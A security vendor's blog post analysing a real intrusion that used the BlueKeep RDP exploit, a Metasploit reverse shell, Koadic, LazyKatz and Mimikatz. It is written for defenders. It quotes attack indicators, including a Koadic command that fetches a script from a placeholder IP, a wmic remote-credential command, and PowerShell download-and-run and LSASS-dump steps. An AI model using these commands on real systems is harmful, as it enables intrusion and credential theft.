UPDATED December 1, 2021: This blog post was updated to reflect the official VMware Carbon Black Cloud Managed Detection and Response (MDR) offering. It showcases the type of real-time analysis from our world-class team of security experts that supports our MDR offering.
VMware Carbon Black’s Managed Detection and Response (MDR) team monitors customer environments to detect and alert on new and emerging threats. Recently, MDR detected malicious behavior that leveraged several attack vectors, including one of the first known uses of the newly released BlueKeep Windows exploit in the wild.
After identifying the malicious behavior, the MDR team collaborated with VMware Carbon Black’s Threat Analysis Unit (TAU) to dive deeper into the detected behaviors and determine that the BlueKeep exploit had been leveraged. In this post, MDR analysts are providing information on the exploit and how it was utilized in this attack, to provide an overview to security practitioners that may be investigating this threat.
After observing unusual Remote Desktop Protocol (RDP) activity on the host, MDR analysts began investigating the incident and observed several other suspicious behaviors, which included post exploitation attack methods, network reconnaissance, and credential stealing.
This attack was targeted and progressed rapidly. MDR analysts immediately triaged the behavior and notified the client within two hours of receiving the initial alert. After supplying the preliminary incident notification, a full investigation was launched into the artifacts to provide additional insight into the behaviors and recommendations for remediation.
Exhibit 1: Attack Overview
Initially Carbon Black Cloud Endpoint Standard’s native engine alerted on abnormal behaviors that were being spawned from trusted applications, which is indicative of living off the land techniques. The alert triage tree below shows a complex chain of events with several concerning Tactics, Techniques, and Procedures (TTPs) surrounding fileless attacks, persistence, and abnormal behavior by system utilities.
Exhibit 2: Alert Triage Tree
Exhibit 3: Detected TTPs
After performing additional research into the behaviors present on the endpoint, MDR analysts determined that the host had been compromised utilizing several attack methods.
Upon further investigation, Carbon Black Cloud Endpoint Standard highlighted an event showing that shellcode was being loaded into the child process spoolsv.exe. This behavior indicated that the attacker was leveraging the BlueKeep exploit and correlates to the Rapid7 Metasploit module. It should be noted that this type of indicator is also observed in the EternalBlue exploit.
Exhibit 4: Blue Keep Behavior
The application C:\windows\system32\spoolsv.exe attempted to create an intra-process thread by calling “CreateThread”, by calling the function “CreateThread”
WHAT IS BLUE KEEP, AND WHAT’S THE BIG DEAL?
BlueKeep (CVE-2019-0708) is a vulnerability in the Windows Remote Desktop Protocol (RDP) services on 64-bit version of Windows 7 and 2008 R2. Similar to EternalBlue, this vulnerability is classified as “wormable,” which allows unauthenticated attackers to run arbitrary malicious code and move laterally through the victim’s network. This exploit has the potential to allow an unauthorized attacker carte blanche access to a victim’s environment.
BlueKeep was recently released as a Metasploit module, their proof of concept requires and attacker to know specific details about the target network. . It is unclear if the attackers in this incident had prior knowledge of the target organization or if they modified the original proof of concept.
Afterward the BlueKeep behavior is documented, network connections were observed over port 4444. This port has been associated with several malicious behaviors such as crypto mining and is known commonly as Metasploit’s default TCP port. Metasploit is a tool that was designed for penetration testers, however it has been adopted by attackers to exploit vulnerabilities in an effort to gain access to a target system or network. Below are indicators showing that the shell code loaded via the BlueKeep exploit has successfully implemented a reverse TCP connection:
Exhibit 5: Metasploit Network Activity
The application C:\windows\system32\spoolsv.exe established a TCP/4444 connection to [REDACTED] (VT / ADB) : 4444 ([REDACTED] (VT / ADB) ) from [REDACTED] (VT / ADB) : 60087. The device was on the corporate network using the public address [REDACTED] (VT / ADB) ([REDACTED].Local, located in [REDACTED]). The operation was successful.
Exhibit 6: Reverse TCP Connection
The application C:\windows\system32\spoolsv.exe invoked the application C:\windows\system32\cmd.exe .
Afterwards, we observed RDP related connections and activity. The image below depicts events related to rdpclip.exe, which is a strong indicator the attacker was able to establish a RDP session with the target machine.
Exhibit 7: RDP Authentication
Once the exploit has been successfully executed, the attacker has unauthorized and unrestricted access to execute commands on the compromised system.
After gaining access to the environment, the attacker performed several reconnaissance related activities to obtain additional information about the user and network. Typically, as in this case, attackers leverage native OS tools (like net.exe) to obtain this information.
Here we can see that net.exe was used to create a user account on the domain controller. Creating an account on a domain controller grants additional access levels.
Exhibit 8: User Account Creation
The attacker also employed whoami to determine which user account they were on and ipconfig to obtain information about the network configuration.
Exhibit 9: Reconnaissance Behaviors
Creating new user accounts and escalating account privileges are a common attack techniques to gain additional access and persistence on a host or network.
This attack also utilized a post-exploitation COM & Command rootkit tool developed by zerosum0x0 called Koadic. This post-exploitation works similar to Meterpreter and Powershell Empire to allow for pivoting and escalating privileges within a victim’s environment. This technique leverages Living Off the Land (LoL) techniques to compromise legitimate processes such as mshta, regsvr32, and rundll32 which allow for the retrieval and execution of malicious payloads on the target system.
CB Defense alerted after observing some common host-based indicators for Koadic. (NOTE: Ports can vary on the host-based indicators).
Exhibit 10: Initial Koadic Indicator
/s /u /n /i:http://XXX.XXX.XXX.XXX:8080/[random characters]; scrobj.dll
Exhibit 11: Scrobj.dll Koadic Indicator
- As well as dynwrapx.dll being dropped by rundll32.exe:
Exhibit 12: Dynwrapx.dll File Drop
This type of attack method enlists legitimate, trusted applications to carry out malicious actions or to deliver malicious payloads, as seen with the behavior displayed above. This technique is utilized to evade detection from traditional antivirus platforms that rely on signature based detections.
MDR analysts observed and alerted on this behavior as it progressed through the kill chain. After the initial exploitation of the BlueKeep vulnerability, reconnaissance behavior, account creation, and reverse handles were observed. Finally, the attackers were observed trying to escalate privileges, allowing for lateral movement within the environment.
Privilege escalation and credential dumping were observed utilizing an automated tool developed to extract credentials from remote targets named LazyKatz. LazyKatz is useful for attackers as it attempts to bypass traditional antivirus (AV) and/or application allowlisting software.
In another example of living off the land attack techniques, the iexplore.exe process was used to drop the executable on disk from an internal IP address which then invoked the untrusted LazyKatz process.
Exhibit 13: LazyKatz File Drop
Lazykatz also employs psexec.exe, a light-weight telnet-replacement that lets you execute processes on other systems. Once connected to a remote computer, the username and password credentials are exposed and contents are written to a .txt file
Exhibit 14: LazyKatz Output
C:\Windows\system32\cmd.exe /C wmic /node:10.1.208.208 /user:[redacted] /password:[redacted][redacted] os get status 2>&1 | findstr /R /I /C:”.*” > output.txt
Powershell.exe is then leveraged, to call the DownloadString cmdlet to connect to a suspicious domain, download, and then invoke Mimikatz to dump credentials.
Exhibit 15: Mimikatz
Next, a script that leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory was executed. This allows an attacker to dump credentials without ever writing the mimikatz binary to disk.
Finally, a program called Powerline is used. Powerline is a tool that allows remote calls to powershell scripts from the Command Line without calling Powershell directly. This is a newly created tool which is used to bypass application allowlisting tactics.
In this case Powerline is used to execute the Invoke-Mimikatz script. Powerline attempted to generate a memory dump using “MiniDumpWriteDump”, CB Defense identified this behavior as malicious and terminated the application:
Exhibit 16: Powerline
The application C:\[redacted]\powerline.exe attempted to generate a memory dump of “C:\Windows\System32\lsass.exe”, by calling the function “MiniDumpWriteDump”. The operation was blocked and the application terminated by Cb Defense.
This attack leveraged several varying attack methods and highlights how threat actors and their tactics are advancing. With the ever evolving threat landscape providing new and exciting exploits, such as BlueKeep, it’s important that your security team understands how to detect and alert on these malicious behaviors.
Traditional antivirus programs may be unable to provide the same type of protection against attacks that utilize Living Off the Land Binaries or advanced tactics. As attack techniques progress, so must your security solutions. VMware Carbon Black Cloud coupled with MDR’s managed alert triaging service can help protect your organization against advanced threats.
The security community will likely continue to see RDP exploits in the threat landscape as new RDP vulnerabilities continue to be discovered. There are a reported 700,000 systems that are still vulnerable to BlueKeep that have not applied the CVE-2019-0708 patch. System Owners must proactively patch against these RDP vulnerabilities. The following policies can be implemented into CB Defense to help protect against campaigns like the one observed here:
 rapid7. “rapid7/Metasploit-Framework.” GitHub, September 23, 2019. https://github.com/rapid7/metasploit-framework/blob/b668e1fa5b8e148b0985b80e44de0a07985d8d5e/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb.
 Bratescu, Stefan, Cristin Sirbu, and Razvan Ionescu. “How to Exploit BlueKeep Vulnerability with Metasploit.” Pentest. Razvan Ionescu, Stefan Bratescu, Cristin Sirbu, September 9, 2019. https://pentest-tools.com/blog/bluekeep-exploit-metasploit/#installing-bluekeep.
 Gatlan, Sergiu. “Public BlueKeep Exploit Module Released by MetaSploit.” BleepingComputer. BleepingComputer.com, September 6, 2019. https://www.bleepingcomputer.com/news/security/public-bluekeep-exploit-module-released-by-metasploit.
 Kvitchko, Yori, Tom Hessman, Daniel Pendolino, and Ed Skoudis. “Metasploit Cheat Sheet.” Metasploit Cheat Sheet. SANS Institute. Accessed October 23, 2019. https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf.
 Popov, Yuri. “DynamicWrapperX v1.0.” Script-coding.com. Accessed October 10, 2019. https://www.script-coding.com/dynwrapx_eng.html.
 Fehrman, Brian. “Introducing: Powerline!.” WEBCAST_061517_slides_PowerLine., October 27, 2017. https://www.dropbox.com/s/bvxt8v7d72tdpbr/WEBCAST_061517_slides_PowerLine.pptx?dl=0#.
 Cimpanu, Catalin. “Metasploit Team Releases BlueKeep Exploit.” ZDNet. ZDNet, September 6, 2019. https://www.zdnet.com/article/metasploit-team-releases-bluekeep-exploit/.